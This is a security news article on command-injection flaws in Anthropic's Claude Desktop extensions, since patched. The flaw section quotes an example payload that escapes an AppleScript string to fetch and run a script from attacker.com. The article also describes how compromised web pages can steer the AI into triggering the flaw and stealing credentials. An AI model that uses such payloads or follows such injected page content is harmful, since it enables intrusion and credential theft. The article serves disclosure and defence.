Thursday, March 5, 2026

Critical RCE Bugs In Claude Desktop Enable Malicious Code Execution

While cybersecurity headlines often spotlight shady extensions from obscure developers or massive supply chain attacks, even reputable sources can slip up in ways that threaten enterprises.

Researchers at Koi have uncovered critical remote code execution (RCE) vulnerabilities in three extensions created and promoted by Anthropic itself: the Chrome, iMessage, and Apple Notes connectors.

These sit prominently at the top of Claude Desktop’s extension marketplace, underscoring how trust in official tools doesn’t guarantee safety.

The flaws stem from basic command injection issues, allowing a malicious website to hijack seemingly harmless queries like “Where can I play paddle in Brooklyn?” and execute arbitrary code.

The attack flow

Attackers could snag SSH keys, AWS credentials, or browser passwords without installing malware or tricking users into phishing links.

It’s all triggered by normal AI interactions. Anthropic rated each vulnerability high-severity with a CVSS score of 8.9, but they’ve since patched them all.

Unpacking Claude Desktop Extensions

Claude Desktop extensions function as packaged MCP servers, installable in one click from Anthropic’s marketplace.

Delivered as .mcpb bundles, essentially zipped archives with server code and function manifests, they mirror Chrome extensions in ease of installation but diverge sharply in power.

Unlike sandboxed browser add-ons, these run unsandboxed on your system with unrestricted permissions.

They can access files, run commands, grab credentials, and tweak settings, acting as direct bridges between Claude’s AI and your OS. This elevated access amplified the command injection risks.

The Flaw: Simple Injection, Severe Impact

At its core, the bug was straightforward and avoidable. Each extension’s MCP server took user input and fed it unfiltered into AppleScript commands, enabling shell execution with full privileges.

For instance, a request to “open this URL in Chrome” built AppleScript like tell application "Google Chrome" to open location "${url}", using raw string interpolation of the URL.

A crafted URL could escape the string literal, say by injecting "& do shell script "curl https://attacker.com/trojan | sh"&", to run attacker code via do shell script.

This classic vulnerability turned everyday AI use into a vector.

Simulated attacker server code

Claude fetches web content to answer questions, so compromised pages in search results could embed prompts that exploit the extensions, granting remote foes local shell access through the AI’s trusted chain.

From Query To Compromise: A Real-World Scenario

Picture a user with the Chrome extension enabled asking about paddle spots in Brooklyn.

The AI obligingly triggers the extension, unleashing the payload to steal keys, exfiltrate data, or install backdoors, all invisibly.

These official tools highlight broader MCP ecosystem risks, where rapid AI-driven development and lax reviews meet full-system access.

Independent extensions will only heighten the stakes. Users must treat them as potent executors, not mere plugins.

Koi disclosed the issues via Anthropic’s HackerOne program on July 3, 2025.

Partial fixes rolled out by August 14, with full patches in version 0.1.9 on August 28. Verification came September 19. Stay vigilant: AI assistants are powerful, but so are their pitfalls.

Varshini
Varshini is a Cyber Security expert in Threat Analysis, Vulnerability Assessment, and Research. Passionate about staying ahead of emerging Threats and Technologies.